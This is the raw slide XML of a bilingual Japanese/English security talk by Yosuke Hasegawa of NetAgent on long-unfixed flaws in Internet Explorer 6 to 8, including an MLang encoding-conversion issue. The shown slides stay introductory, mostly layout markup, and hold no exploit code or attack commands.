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0"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="258" r:id="rId2"/>
    <p:sldId id="358" r:id="rId3"/>
    <p:sldId id="359" r:id="rId4"/>
    <p:sldId id="360" r:id="rId5"/>
    <p:sldId id="368" r:id="rId6"/>
    <p:sldId id="361" r:id="rId7"/>
    <p:sldId id="362" r:id="rId8"/>
    <p:sldId id="276" r:id="rId9"/>
    <p:sldId id="277" r:id="rId10"/>
    <p:sldId id="281" r:id="rId11"/>
    <p:sldId id="280" r:id="rId12"/>
    <p:sldId id="262" r:id="rId13"/>
    <p:sldId id="279" r:id="rId14"/>
    <p:sldId id="278" r:id="rId15"/>
    <p:sldId id="257" r:id="rId16"/>
    <p:sldId id="282" r:id="rId17"/>
    <p:sldId id="283" r:id="rId18"/>
    <p:sldId id="343" r:id="rId19"/>
    <p:sldId id="285" r:id="rId20"/>
    <p:sldId id="286" r:id="rId21"/>
    <p:sldId id="287" r:id="rId22"/>
    <p:sldId id="288" r:id="rId23"/>
    <p:sldId id="290" r:id="rId24"/>
    <p:sldId id="301" r:id="rId25"/>
    <p:sldId id="291" r:id="rId26"/>
    <p:sldId id="292" r:id="rId27"/>
    <p:sldId id="344" r:id="rId28"/>
    <p:sldId id="345" r:id="rId29"/>
    <p:sldId id="296" r:id="rId30"/>
    <p:sldId id="298" r:id="rId31"/>
    <p:sldId id="299" r:id="rId32"/>
    <p:sldId id="300" r:id="rId33"/>
    <p:sldId id="363" r:id="rId34"/>
    <p:sldId id="364" r:id="rId35"/>
    <p:sldId id="365" r:id="rId36"/>
    <p:sldId id="297" r:id="rId37"/>
    <p:sldId id="315" r:id="rId38"/>
    <p:sldId id="302" r:id="rId39"/>
    <p:sldId id="346" r:id="rId40"/>
    <p:sldId id="347" r:id="rId41"/>
    <p:sldId id="305" r:id="rId42"/>
    <p:sldId id="306" r:id="rId43"/>
    <p:sldId id="307" r:id="rId44"/>
    <p:sldId id="308" r:id="rId45"/>
    <p:sldId id="309" r:id="rId46"/>
    <p:sldId id="348" r:id="rId47"/>
    <p:sldId id="349" r:id="rId48"/>
    <p:sldId id="312" r:id="rId49"/>
    <p:sldId id="314" r:id="rId50"/>
    <p:sldId id="342" r:id="rId51"/>
    <p:sldId id="316" r:id="rId52"/>
    <p:sldId id="317" r:id="rId53"/>
    <p:sldId id="350" r:id="rId54"/>
    <p:sldId id="351" r:id="rId55"/>
    <p:sldId id="320" r:id="rId56"/>
    <p:sldId id="321" r:id="rId57"/>
    <p:sldId id="322" r:id="rId58"/>
    <p:sldId id="323" r:id="rId59"/>
    <p:sldId id="324" r:id="rId60"/>
    <p:sldId id="353" r:id="rId61"/>
    <p:sldId id="352" r:id="rId62"/>
    <p:sldId id="328" r:id="rId63"/>
    <p:sldId id="367" r:id="rId64"/>
    <p:sldId id="334" r:id="rId65"/>
    <p:sldId id="335" r:id="rId66"/>
    <p:sldId id="337" r:id="rId67"/>
    <p:sldId id="339" r:id="rId68"/>
    <p:sldId id="340" r:id="rId69"/>
    <p:sldId id="341" r:id="rId70"/>
    <p:sldId id="354" r:id="rId71"/>
    <p:sldId id="355" r:id="rId72"/>
    <p:sldId id="356" r:id="rId73"/>
    <p:sldId id="327" r:id="rId74"/>
    <p:sldId id="357" r:id="rId75"/>
    <p:sldId id="329" r:id="rId76"/>
    <p:sldId id="332" r:id="rId77"/>
    <p:sldId id="331" r:id="rId78"/>
    <p:sldId id="330" r:id="rId79"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Calibri" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId81"/>
      <p:bold r:id="rId82"/>
      <p:italic r:id="rId83"/>
      <p:boldItalic r:id="rId84"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Arial Black" pitchFamily="34" charset="0"/>
      <p:bold r:id="rId85"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Aharoni" pitchFamily="2" charset="-79"/>
      <p:bold r:id="rId86"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="メイリオ" pitchFamily="50" charset="-128"/>
      <p:regular r:id="rId87"/>
      <p:bold r:id="rId88"/>
      <p:italic r:id="rId89"/>
      <p:boldItalic r:id="rId90"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Arial Unicode MS" pitchFamily="50" charset="-128"/>
      <p:regular r:id="rId91"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Candara" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId92"/>
      <p:bold r:id="rId93"/>
      <p:italic r:id="rId94"/>
      <p:boldItalic r:id="rId95"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="HG創英角ﾎﾟｯﾌﾟ体" pitchFamily="49" charset="-128"/>
      <p:regular r:id="rId96"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Malgun Gothic" pitchFamily="34" charset="-127"/>
      <p:regular r:id="rId97"/>
      <p:bold r:id="rId98"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Aparajita" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId99"/>
      <p:bold r:id="rId100"/>
      <p:italic r:id="rId101"/>
      <p:boldItalic r:id="rId10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7C80"/>
    <a:srgbClr val="FFFF99"/>
    <a:srgbClr val="EF6011"/>
    <a:srgbClr val="3C7BC7"/>
    <a:srgbClr val="2C5D98"/>
    <a:srgbClr val="0066CC"/>
    <a:srgbClr val="CCFF99"/>
    <a:srgbClr val="FFFF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7383" autoAdjust="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7.fntdata"/><Relationship Id="rId102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20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5.fntdata"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font13.fntdata"/><Relationship Id="rId98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font" Target="fonts/font14.fntdata"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font19.fntdata"/><Relationship Id="rId10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7.fntdata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99FC-3D08-4969-91AF-24016E61F389}" type="datetimeFigureOut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050BA-50EC-4982-8901-4FF87380B4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69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78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050BA-50EC-4982-8901-4FF87380B43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E34-C885-4733-AF73-8EC398941810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B032-C6D9-4FC5-966C-AEB05E7D33E6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B95C-0E57-4DAB-BEC2-BEAD5CE8CCD6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 userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="144016"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="007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/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>
            <a:lvl1pPr>
              <a:buClr>
                <a:srgbClr val="00CC00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defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:buClr>
                <a:srgbClr val="007DDA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defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr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defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr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defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr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defRPr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Candara" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{EB7A3B08-6B92-4B0D-AB63-EC8965080B81}" type="slidenum">
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>&lt;#&gt;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 userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6581001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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>INNOVATION TO THE FUTURE   </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" sz="1200" i="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>NetAgent Co., Ltd.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="1200" i="1">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="8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0" y="6453337"/>
            <a:ext cx="9144000" cy="144016"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="007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BA86-B030-4679-8BD1-69D77396DA7F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00BB-6433-4288-958D-9D11864C17EA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DABC-5CC9-4F4A-B890-A61893C81D66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D52F-3637-4C0A-9A8C-DB973901904F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9CF1-0277-4B6A-980C-395305BEF4A1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245-6522-49F1-8B34-A770A70A10F8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D27A-3E7E-4097-B8D9-17344D8DAF34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7B2A-B283-499A-A565-B736F5FD594A}" type="datetime1">
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0"/>
              <a:pPr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3B08-6B92-4B0D-AB63-EC8965080B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340768"/>
            <a:ext cx="9144000" cy="3096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8100392" cy="2808312"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="530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>Internet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="53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en-US" altLang="ja-JP" sz="53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>Explorer</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="53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</a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="5300" dirty="0" err="1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>exSpoilt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="53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en-US" altLang="ja-JP" sz="53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>Milk codes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="60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/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="60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</a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="18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/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="18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</a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Black" pitchFamily="34" charset="0"/>
                <a:cs typeface="Aharoni" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="4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メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:cs typeface="Aharoni" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>～ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="4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メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:cs typeface="Aharoni" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="4000" b="1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メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:cs typeface="Aharoni" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>への</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="4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メイリオ" pitchFamily="50" charset="-128"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:cs typeface="Aharoni" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>腐ったミルク攻撃 ～</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="6000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="メイリオ" pitchFamily="50" charset="-128"/>
              <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
              <a:cs typeface="Aharoni" pitchFamily="2" charset="-79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4788024" y="4581128"/>
            <a:ext cx="417646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 Black" pitchFamily="34" charset="0"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Yosuke HASEGAWA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" pitchFamily="34" charset="0"/>
                <a:ea typeface="メイリオ" pitchFamily="50" charset="-128"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://j.mp/yosuke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618353"/>
            <a:ext cx="2473529" cy="119502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4" name="正方形/長方形 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4293096"/>
            <a:ext cx="9144000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0" y="1340768"/>
            <a:ext cx="9144000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268760"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t>IE6 is 'spoilt milk' browser</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IE6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>は腐ったミルクみたいなブラウザ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624736" cy="51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Today's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topic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:cs typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>今日の話題</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill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IE6 is 'spoilt milk' web browser.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IE6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は腐ったミルクみたいなブラウザ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pPr lvl="1"/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Microsoft themselves admitted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Microsoft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自身も認めている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Many security flaws left untouched for years.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長い間放置されている問題点が多数。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Junst only IE6? No.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IE6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だけ</a:t>
            </a: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? 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まさか。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pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="ja-JP" b="1" smtClean="0"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endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US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9512" y="1196752"/>
            <a:ext cx="8640960" cy="2160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9512" y="4941168"/>
            <a:ext cx="8640960" cy="11521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268760"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3600" smtClean="0"/>
              <a:t>Many flaws left untouched for years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z="2800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>長い間放置されている問題点が多数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9633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4572000" y="616530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smtClean="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" smtClean="0">
                <a:latin typeface="Candara" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>www.youtube.com/watch?v=KZSnCbGDl6Y</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="140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Today's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topic </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>今日の話題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IE6 is 'spoilt milk' web browser.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IE6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は腐ったミルクみたいなブラウザ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pPr lvl="1"/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Microsoft themselves admitted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Microsoft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自身も認めている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Many security flaws left untouched for years.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長い間放置されている問題点が多数。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Junst only IE6? No.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IE6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だけ</a:t>
            </a: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? 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まさか。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pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="ja-JP" b="1" smtClean="0"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endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US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9512" y="1196752"/>
            <a:ext cx="8640960" cy="37444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721" y="2442373"/>
            <a:ext cx="3343751" cy="293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smtClean="0"/>
              <a:t>Just only IE6? No. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IE6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>だけ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3100" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>まさか。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Also IE7 and IE8 has flaws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IE7/8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>も問題あり</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP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457" y="3068962"/>
            <a:ext cx="3027998" cy="32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278" y="3933056"/>
            <a:ext cx="3416618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Today's</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>topic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:cs typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>今日の話題</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"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3600" smtClean="0"/>
              <a:t>for the IE9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3600" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IE9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>に向けて</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2800" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr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expect IE becomes more secure browser by shedding light on past flaws </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>既存の問題点を明らかにすることで</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IE9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>をセキュアなものに</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!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ja-JP" sz="7200" dirty="0" smtClean="0"/>
              <a:t>Untouched flaws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="6000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="6000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="5400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>放置されたままの問題点</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="6000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="Malgun Gothic" pitchFamily="34" charset="-127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191683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MLang encode conversion issue</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MLang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="3600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>のエンコード変換時の問題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kumimoji="1" lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t>"MLang" : DLL for multi language support including conversion of text encoding</a:t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>
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MLang : </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文字エンコーディング変換などを含む、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>複数の言語をサポートするための</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DLL</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="ja-JP" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t>ConvertINetMultiByteToUnicode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t>ConvertINetUnicodeToMultiByte</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t>ConvertINetString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Who</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>am I ? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
              </a:rPr>
              <a:t>自己紹介</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:cs typeface="Arial Unicode MS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dirty="0" smtClean="0"/>
              <a:t>Yosuke HASEGAWA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:cs typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>はせがわようすけ</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:cs typeface="メイリオ" pitchFamily="50" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" err="1" smtClean="0"/>
              <a:t>NetAgent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Co.,Ltd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>. R&amp;D dept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003399"/>
                </a:solidFill>
                <a:cs typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>ネットエージェント</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:cs typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:cs typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>株</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:cs typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:cs typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>研究開発部</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:cs typeface="メイリオ" pitchFamily="50" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>http://utf-8.jp/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>Writing obfuscated JavaScript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3399"/>
                </a:solidFill>
                <a:cs typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:cs typeface="メイリオ" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>の難読化エンジン書いてます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>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>jjencode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aaencode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65454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4283968" y="3429000"/>
            <a:ext cx="4680520" cy="2592288"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13807"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="100000">
                <a:srgbClr val="2C5D98"/>
              </a:gs>
              <a:gs pos="0">
                <a:srgbClr val="3C7BC7"/>
              </a:gs>
              <a:gs pos="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4283968" y="3429000"/>
            <a:ext cx="4680520" cy="2592288"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
